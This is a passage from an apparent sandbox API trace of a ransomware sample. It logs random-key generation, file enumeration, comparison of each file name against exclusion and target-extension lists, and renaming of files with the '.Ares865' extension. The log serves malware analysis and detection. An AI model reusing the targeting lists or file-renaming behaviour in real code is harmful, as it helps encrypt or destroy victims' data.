lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.832] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.835] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.836] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.836] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0084.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0084.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.837] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.837] CloseHandle (hObject=0x15c) returned 1 [0084.837] CloseHandle (hObject=0x118) returned 1 [0084.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.838] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae37ff5c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae37ff5c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdccb1d11, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile20.bmp", cAlternateFileName="")) returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="aoldtz.exe") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2=".") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="..") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="windows") returned -1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="bootmgr") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="temp") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="pagefile.sys") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="boot") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="ids.txt") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="ntuser.dat") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="perflogs") returned 1 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2="MSBuild") returned 1 [0084.838] lstrlenW (lpString="usertile20.bmp") returned 14 [0084.838] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned 82 [0084.838] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile20.bmp" | out: lpString1="usertile20.bmp") returned="usertile20.bmp" [0084.838] lstrlenW (lpString="usertile20.bmp") returned 14 [0084.838] lstrlenW (lpString="Ares865") returned 7 [0084.838] lstrcmpiW (lpString1="e20.bmp", lpString2="Ares865") returned 1 [0084.838] lstrlenW (lpString=".dll") returned 4 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2=".dll") returned 1 [0084.838] lstrlenW (lpString=".lnk") returned 4 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2=".lnk") returned 1 [0084.838] lstrlenW (lpString=".ini") returned 4 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2=".ini") returned 1 [0084.838] lstrlenW (lpString=".sys") returned 4 [0084.838] lstrcmpiW (lpString1="usertile20.bmp", lpString2=".sys") returned 1 [0084.838] lstrlenW (lpString="usertile20.bmp") returned 14 [0084.838] lstrlenW (lpString="bak") returned 3 [0084.838] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.838] lstrlenW (lpString="ba_") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.839] lstrlenW (lpString="dbb") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.839] lstrlenW (lpString="vmdk") returned 4 [0084.839] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.839] lstrlenW (lpString="rar") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.839] lstrlenW (lpString="zip") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.839] lstrlenW (lpString="tgz") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.839] lstrlenW (lpString="vbox") returned 4 [0084.839] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.839] lstrlenW (lpString="vdi") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.839] lstrlenW (lpString="vhd") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.839] lstrlenW (lpString="vhdx") returned 4 [0084.839] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.839] lstrlenW (lpString="avhd") returned 4 [0084.839] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.839] lstrlenW (lpString="db") returned 2 [0084.839] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.839] lstrlenW (lpString="db2") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.839] lstrlenW (lpString="db3") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.839] lstrlenW (lpString="dbf") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.839] lstrlenW (lpString="mdf") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.839] lstrlenW (lpString="mdb") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.839] lstrlenW (lpString="sql") returned 3 [0084.839] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.839] lstrlenW (lpString="sqlite") returned 6 [0084.839] lstrcmpiW (lpString1="20.bmp", lpString2="sqlite") returned -1 [0084.839] lstrlenW (lpString="sqlite3") returned 7 [0084.840] lstrcmpiW (lpString1="e20.bmp", lpString2="sqlite3") returned -1 [0084.840] lstrlenW (lpString="sqlitedb") returned 8 [0084.840] lstrcmpiW (lpString1="le20.bmp", lpString2="sqlitedb") returned -1 [0084.840] lstrlenW (lpString="xml") returned 3 [0084.840] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.840] lstrlenW (lpString="$er") returned 3 [0084.840] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.840] lstrlenW (lpString="4dd") returned 3 [0084.840] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.840] lstrlenW (lpString="4dl") returned 3 [0084.840] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.840] lstrlenW (lpString="^^^") returned 3 [0084.840] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.840] lstrlenW (lpString="abs") returned 3 [0084.840] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.840] lstrlenW (lpString="abx") returned 3 [0084.840] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.840] lstrlenW (lpString="accdb") returned 5 [0084.840] lstrcmpiW (lpString1="0.bmp", lpString2="accdb") returned -1 [0084.840] lstrlenW (lpString="accdc") returned 5 [0084.840] lstrcmpiW (lpString1="0.bmp", lpString2="accdc") returned -1 [0084.840] lstrlenW (lpString="accde") returned 5 [0084.840] lstrcmpiW (lpString1="0.bmp", lpString2="accde") returned -1 [0084.840] lstrlenW (lpString="accdr") returned 5 [0084.840] lstrcmpiW (lpString1="0.bmp", lpString2="accdr") returned -1 [0084.840] lstrlenW (lpString="accdt") returned 5 [0084.840] lstrcmpiW (lpString1="0.bmp", lpString2="accdt") returned -1 [0084.840] lstrlenW (lpString="accdw") returned 5 [0084.840] lstrcmpiW (lpString1="0.bmp", lpString2="accdw") returned -1 [0084.840] lstrlenW (lpString="accft") returned 5 [0084.840] lstrcmpiW (lpString1="0.bmp", lpString2="accft") returned -1 [0084.840] lstrlenW (lpString="adb") returned 3 [0084.840] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.840] lstrlenW (lpString="adb") returned 3 [0084.840] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.840] lstrlenW (lpString="ade") returned 3 [0084.840] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.840] lstrlenW (lpString="adf") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.841] lstrlenW (lpString="adn") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.841] lstrlenW (lpString="adp") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.841] lstrlenW (lpString="alf") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.841] lstrlenW (lpString="ask") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.841] lstrlenW (lpString="btr") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.841] lstrlenW (lpString="cat") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.841] lstrlenW (lpString="cdb") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.841] lstrlenW (lpString="ckp") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.841] lstrlenW (lpString="cma") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.841] lstrlenW (lpString="cpd") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.841] lstrlenW (lpString="dacpac") returned 6 [0084.841] lstrcmpiW (lpString1="20.bmp", lpString2="dacpac") returned -1 [0084.841] lstrlenW (lpString="dad") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.841] lstrlenW (lpString="dadiagrams") returned 10 [0084.841] lstrcmpiW (lpString1="tile20.bmp", lpString2="dadiagrams") returned 1 [0084.841] lstrlenW (lpString="daschema") returned 8 [0084.841] lstrcmpiW (lpString1="le20.bmp", lpString2="daschema") returned 1 [0084.841] lstrlenW (lpString="db-journal") returned 10 [0084.841] lstrcmpiW (lpString1="tile20.bmp", lpString2="db-journal") returned 1 [0084.841] lstrlenW (lpString="db-shm") returned 6 [0084.841] lstrcmpiW (lpString1="20.bmp", lpString2="db-shm") returned -1 [0084.841] lstrlenW (lpString="db-wal") returned 6 [0084.841] lstrcmpiW (lpString1="20.bmp", lpString2="db-wal") returned -1 [0084.841] lstrlenW (lpString="dbc") returned 3 [0084.841] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.841] lstrlenW (lpString="dbs") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.842] lstrlenW (lpString="dbt") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.842] lstrlenW (lpString="dbv") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.842] lstrlenW (lpString="dbx") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.842] lstrlenW (lpString="dcb") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.842] lstrlenW (lpString="dct") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.842] lstrlenW (lpString="dcx") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.842] lstrlenW (lpString="ddl") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.842] lstrlenW (lpString="dlis") returned 4 [0084.842] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.842] lstrlenW (lpString="dp1") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.842] lstrlenW (lpString="dqy") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.842] lstrlenW (lpString="dsk") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.842] lstrlenW (lpString="dsn") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.842] lstrlenW (lpString="dtsx") returned 4 [0084.842] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.842] lstrlenW (lpString="dxl") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.842] lstrlenW (lpString="eco") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.842] lstrlenW (lpString="ecx") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.842] lstrlenW (lpString="edb") returned 3 [0084.842] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.842] lstrlenW (lpString="epim") returned 4 [0084.842] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.843] lstrlenW (lpString="fcd") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.843] lstrlenW (lpString="fdb") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.843] lstrlenW (lpString="fic") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.843] lstrlenW (lpString="flexolibrary") returned 12 [0084.843] lstrcmpiW (lpString1="ertile20.bmp", lpString2="flexolibrary") returned -1 [0084.843] lstrlenW (lpString="fm5") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.843] lstrlenW (lpString="fmp") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.843] lstrlenW (lpString="fmp12") returned 5 [0084.843] lstrcmpiW (lpString1="0.bmp", lpString2="fmp12") returned -1 [0084.843] lstrlenW (lpString="fmpsl") returned 5 [0084.843] lstrcmpiW (lpString1="0.bmp", lpString2="fmpsl") returned -1 [0084.843] lstrlenW (lpString="fol") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.843] lstrlenW (lpString="fp3") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.843] lstrlenW (lpString="fp4") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.843] lstrlenW (lpString="fp5") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.843] lstrlenW (lpString="fp7") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.843] lstrlenW (lpString="fpt") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.843] lstrlenW (lpString="frm") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.843] lstrlenW (lpString="gdb") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.843] lstrlenW (lpString="gdb") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.843] lstrlenW (lpString="grdb") returned 4 [0084.843] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.843] lstrlenW (lpString="gwi") returned 3 [0084.843] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.844] lstrlenW (lpString="hdb") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.844] lstrlenW (lpString="his") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.844] lstrlenW (lpString="ib") returned 2 [0084.844] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.844] lstrlenW (lpString="idb") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.844] lstrlenW (lpString="ihx") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.844] lstrlenW (lpString="itdb") returned 4 [0084.844] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.844] lstrlenW (lpString="itw") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.844] lstrlenW (lpString="jet") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.844] lstrlenW (lpString="jtx") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.844] lstrlenW (lpString="kdb") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.844] lstrlenW (lpString="kexi") returned 4 [0084.844] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.844] lstrlenW (lpString="kexic") returned 5 [0084.844] lstrcmpiW (lpString1="0.bmp", lpString2="kexic") returned -1 [0084.844] lstrlenW (lpString="kexis") returned 5 [0084.844] lstrcmpiW (lpString1="0.bmp", lpString2="kexis") returned -1 [0084.844] lstrlenW (lpString="lgc") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.844] lstrlenW (lpString="lwx") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.844] lstrlenW (lpString="maf") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.844] lstrlenW (lpString="maq") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.844] lstrlenW (lpString="mar") returned 3 [0084.844] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.844] lstrlenW (lpString="marshal") returned 7 [0084.845] lstrcmpiW (lpString1="e20.bmp", lpString2="marshal") returned -1 [0084.845] lstrlenW (lpString="mas") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.845] lstrlenW (lpString="mav") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.845] lstrlenW (lpString="maw") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.845] lstrlenW (lpString="mdbhtml") returned 7 [0084.845] lstrcmpiW (lpString1="e20.bmp", lpString2="mdbhtml") returned -1 [0084.845] lstrlenW (lpString="mdn") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.845] lstrlenW (lpString="mdt") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.845] lstrlenW (lpString="mfd") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.845] lstrlenW (lpString="mpd") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.845] lstrlenW (lpString="mrg") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.845] lstrlenW (lpString="mud") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.845] lstrlenW (lpString="mwb") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.845] lstrlenW (lpString="myd") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.845] lstrlenW (lpString="ndf") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.845] lstrlenW (lpString="nnt") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.845] lstrlenW (lpString="nrmlib") returned 6 [0084.845] lstrcmpiW (lpString1="20.bmp", lpString2="nrmlib") returned -1 [0084.845] lstrlenW (lpString="ns2") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.845] lstrlenW (lpString="ns3") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.845] lstrlenW (lpString="ns4") returned 3 [0084.845] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.845] lstrlenW (lpString="nsf") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.846] lstrlenW (lpString="nv") returned 2 [0084.846] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.846] lstrlenW (lpString="nv2") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.846] lstrlenW (lpString="nwdb") returned 4 [0084.846] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.846] lstrlenW (lpString="nyf") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.846] lstrlenW (lpString="odb") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.846] lstrlenW (lpString="odb") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.846] lstrlenW (lpString="oqy") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.846] lstrlenW (lpString="ora") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.846] lstrlenW (lpString="orx") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.846] lstrlenW (lpString="owc") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.846] lstrlenW (lpString="p96") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.846] lstrlenW (lpString="p97") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.846] lstrlenW (lpString="pan") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.846] lstrlenW (lpString="pdb") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.846] lstrlenW (lpString="pdm") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.846] lstrlenW (lpString="pnz") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.846] lstrlenW (lpString="qry") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.846] lstrlenW (lpString="qvd") returned 3 [0084.846] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.846] lstrlenW (lpString="rbf") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.847] lstrlenW (lpString="rctd") returned 4 [0084.847] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.847] lstrlenW (lpString="rod") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.847] lstrlenW (lpString="rodx") returned 4 [0084.847] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.847] lstrlenW (lpString="rpd") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.847] lstrlenW (lpString="rsd") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.847] lstrlenW (lpString="sas7bdat") returned 8 [0084.847] lstrcmpiW (lpString1="le20.bmp", lpString2="sas7bdat") returned -1 [0084.847] lstrlenW (lpString="sbf") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.847] lstrlenW (lpString="scx") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.847] lstrlenW (lpString="sdb") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.847] lstrlenW (lpString="sdc") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.847] lstrlenW (lpString="sdf") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.847] lstrlenW (lpString="sis") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.847] lstrlenW (lpString="spq") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.847] lstrlenW (lpString="te") returned 2 [0084.847] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.847] lstrlenW (lpString="teacher") returned 7 [0084.847] lstrcmpiW (lpString1="e20.bmp", lpString2="teacher") returned -1 [0084.847] lstrlenW (lpString="tmd") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.847] lstrlenW (lpString="tps") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.847] lstrlenW (lpString="trc") returned 3 [0084.847] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.847] lstrlenW (lpString="trc") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.848] lstrlenW (lpString="trm") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.848] lstrlenW (lpString="udb") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.848] lstrlenW (lpString="udl") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.848] lstrlenW (lpString="usr") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.848] lstrlenW (lpString="v12") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.848] lstrlenW (lpString="vis") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.848] lstrlenW (lpString="vpd") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.848] lstrlenW (lpString="vvv") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.848] lstrlenW (lpString="wdb") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.848] lstrlenW (lpString="wmdb") returned 4 [0084.848] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.848] lstrlenW (lpString="wrk") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.848] lstrlenW (lpString="xdb") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.848] lstrlenW (lpString="xld") returned 3 [0084.848] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.848] lstrlenW (lpString="xmlff") returned 5 [0084.848] lstrcmpiW (lpString1="0.bmp", lpString2="xmlff") returned -1 [0084.848] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.Ares865") returned 90 [0084.848] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.Ares865" (normalized: "c:\\users\\all 